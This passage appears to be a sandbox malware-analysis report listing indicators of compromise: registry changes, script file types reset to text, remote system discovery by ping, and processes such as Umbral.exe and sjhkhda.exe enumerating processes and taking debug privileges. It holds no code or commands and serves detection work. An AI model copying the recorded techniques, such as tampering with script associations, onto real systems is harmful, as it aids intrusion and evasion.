Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe

Modifies registry class 64 IoCs

Processes:

DrvInst.exeregsvr32.exe1.exemsedge.exeexplorer.exejaffa.exeooezvphdfx.exeSearchApp.exe3.exe3.execmd.execmd.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\ = "TV Audio Property Page"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2"	1.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}\ = "Analog Crossbar Property Page"	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ooezvphdfx.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{19689BF6-C384-48FD-AD51-90E58C79F70B}\FriendlyName = "WDM Streaming Encoder Devices"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "33372C779C2C82556D4377D0702E2CDA7DF165A8"	jaffa.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLV.Classes	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile"	ooezvphdfx.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\psiphon\shell\open	3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ = "%SystemRoot%\\System32\\ksxbar.ax"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile"	ooezvphdfx.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\psiphon\URL Protocol	3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\ = "TV Tuner Property Page"	DrvInst.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A801-A46D-11d0-A18C-00A02401DCD4}\FriendlyName = "WDM Streaming Crossbar Devices"	DrvInst.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7F8CFCFC4F2A821B9047D62F7E94BD95E140584467366331D791"	jaffa.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295"	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32\ThreadingModel = "Both"	DrvInst.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "193AC60815E5DAB0B8B97CE1ED9F37C8"	jaffa.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{A799A801-A46D-11d0-A18C-00A02401DCD4}	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32	DrvInst.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}	regsvr32.exe

NTFS ADS 1 IoCs

Processes:

notepad.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe:ZoneIdentifier notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4188 PING.EXE
2376 PING.EXE
4628 PING.EXE
5848 PING.EXE
3256 PING.EXE
2788 PING.EXE
6416 PING.EXE
Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

6188 regedit.exe
Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

vlc.exeWINWORD.EXEsjhkhda.exe

pid process

3048 vlc.exe
4784 WINWORD.EXE
4784 WINWORD.EXE
4348 sjhkhda.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exeWinaeroTweaker-1.40.0.0-setup.tmpUmbral.exepowershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exemsedge.exemsedge.exejkka.exesjhkhda.exesjhkhda.exemsedge.exemsedge.exe

pid	process
1028	msedge.exe
1028	msedge.exe
3856	msedge.exe
3856	msedge.exe
5808	msedge.exe
5808	msedge.exe
4940	msedge.exe
4940	msedge.exe
5548	WinaeroTweaker-1.40.0.0-setup.tmp
5548	WinaeroTweaker-1.40.0.0-setup.tmp
5772	Umbral.exe
5772	Umbral.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
2632	msedge.exe
2632	msedge.exe
208	msedge.exe
208	msedge.exe
3620	powershell.exe
3620	powershell.exe
3620	powershell.exe
7140	powershell.exe
7140	powershell.exe
7140	powershell.exe
5504	powershell.exe
5504	powershell.exe
5504	powershell.exe
6444	powershell.exe
6444	powershell.exe
6444	powershell.exe
5724	msedge.exe
5724	msedge.exe
2784	msedge.exe
2784	msedge.exe
5424	msedge.exe
5424	msedge.exe
1220	msedge.exe
1220	msedge.exe
6648	jkka.exe
6648	jkka.exe
5244	sjhkhda.exe
5244	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3728	msedge.exe
3728	msedge.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
6136	msedge.exe
6136	msedge.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe
3380	sjhkhda.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

vlc.exemsedge.exe!FIXInj.exeexplorer.exe

pid process

3048 vlc.exe
2328 msedge.exe
2404 !FIXInj.exe
2196 explorer.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sjhkhda.exe

pid process

5244 sjhkhda.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

pid	process
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
4940	msedge.exe
4940	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeRover.exetaskkill.exetaskkill.exeAUDIODG.EXEtaskkill.exescary.exeRomilyaa.exesvchost.exeinsdrv.exeDrvInst.exeinsdrv.exeDrvInst.exetaskkill.exeUmbral.exeSolaraBootstrapper.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	4580	Rover.exe
Token: SeDebugPrivilege	5932	taskkill.exe
Token: SeDebugPrivilege	5620	taskkill.exe
Token: 33	3128	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3128	AUDIODG.EXE
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	2852	scary.exe
Token: SeDebugPrivilege	5948	Romilyaa.exe
Token: SeAuditPrivilege	5228	svchost.exe
Token: SeSecurityPrivilege	5228	svchost.exe
Token: SeLoadDriverPrivilege	5764	insdrv.exe
Token: SeLoadDriverPrivilege	2184	DrvInst.exe
Token: SeLoadDriverPrivilege	2184	DrvInst.exe
Token: SeLoadDriverPrivilege	2184	DrvInst.exe
Token: SeLoadDriverPrivilege	5156	insdrv.exe
Token: SeRestorePrivilege	2292	DrvInst.exe
Token: SeBackupPrivilege	2292	DrvInst.exe
Token: SeRestorePrivilege	2292	DrvInst.exe
Token: SeBackupPrivilege	2292	DrvInst.exe
Token: SeRestorePrivilege	2292	DrvInst.exe
Token: SeBackupPrivilege	2292	DrvInst.exe
Token: SeLoadDriverPrivilege	2292	DrvInst.exe
Token: SeLoadDriverPrivilege	2292	DrvInst.exe
Token: SeLoadDriverPrivilege	2292	DrvInst.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	5772	Umbral.exe
Token: SeDebugPrivilege	2344	SolaraBootstrapper.exe
Token: SeIncreaseQuotaPrivilege	6100	wmic.exe
Token: SeSecurityPrivilege	6100	wmic.exe
Token: SeTakeOwnershipPrivilege	6100	wmic.exe
Token: SeLoadDriverPrivilege	6100	wmic.exe
Token: SeSystemProfilePrivilege	6100	wmic.exe
Token: SeSystemtimePrivilege	6100	wmic.exe
Token: SeProfSingleProcessPrivilege	6100	wmic.exe
Token: SeIncBasePriorityPrivilege	6100	wmic.exe
Token: SeCreatePagefilePrivilege	6100	wmic.exe
Token: SeBackupPrivilege	6100	wmic.exe
Token: SeRestorePrivilege	6100	wmic.exe
Token: SeShutdownPrivilege	6100	wmic.exe
Token: SeDebugPrivilege	6100	wmic.exe
Token: SeSystemEnvironmentPrivilege	6100	wmic.exe
Token: SeRemoteShutdownPrivilege	6100	wmic.exe
Token: SeUndockPrivilege	6100	wmic.exe
Token: SeManageVolumePrivilege	6100	wmic.exe
Token: 33	6100	wmic.exe
Token: 34	6100	wmic.exe
Token: 35	6100	wmic.exe
Token: 36	6100	wmic.exe
Token: SeIncreaseQuotaPrivilege	6100	wmic.exe
Token: SeSecurityPrivilege	6100	wmic.exe
Token: SeTakeOwnershipPrivilege	6100	wmic.exe
Token: SeLoadDriverPrivilege	6100	wmic.exe
Token: SeSystemProfilePrivilege	6100	wmic.exe
Token: SeSystemtimePrivilege	6100	wmic.exe
Token: SeProfSingleProcessPrivilege	6100	wmic.exe
Token: SeIncBasePriorityPrivilege	6100	wmic.exe
Token: SeCreatePagefilePrivilege	6100	wmic.exe
Token: SeBackupPrivilege	6100	wmic.exe
Token: SeRestorePrivilege	6100	wmic.exe
Token: SeShutdownPrivilege	6100	wmic.exe
Token: SeDebugPrivilege	6100	wmic.exe
Token: SeSystemEnvironmentPrivilege	6100	wmic.exe
Token: SeRemoteShutdownPrivilege	6100	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exeefsui.exemsedge.exeGoogle.exeWinaeroTweaker-1.40.0.0-setup.tmpRomilyaa.exevlc.exemsedge.exe

pid	process
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
5836	efsui.exe
5836	efsui.exe
5836	efsui.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
2932	Google.exe
5548	WinaeroTweaker-1.40.0.0-setup.tmp
5948	Romilyaa.exe
3048	vlc.exe
3048	vlc.exe
3048	vlc.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exeefsui.exemsedge.exeRomilyaa.exevlc.exemsedge.exe

pid	process
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
1028	msedge.exe
5836	efsui.exe
5836	efsui.exe
5836	efsui.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
5948	Romilyaa.exe
3048	vlc.exe
3048	vlc.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
208	msedge.exe
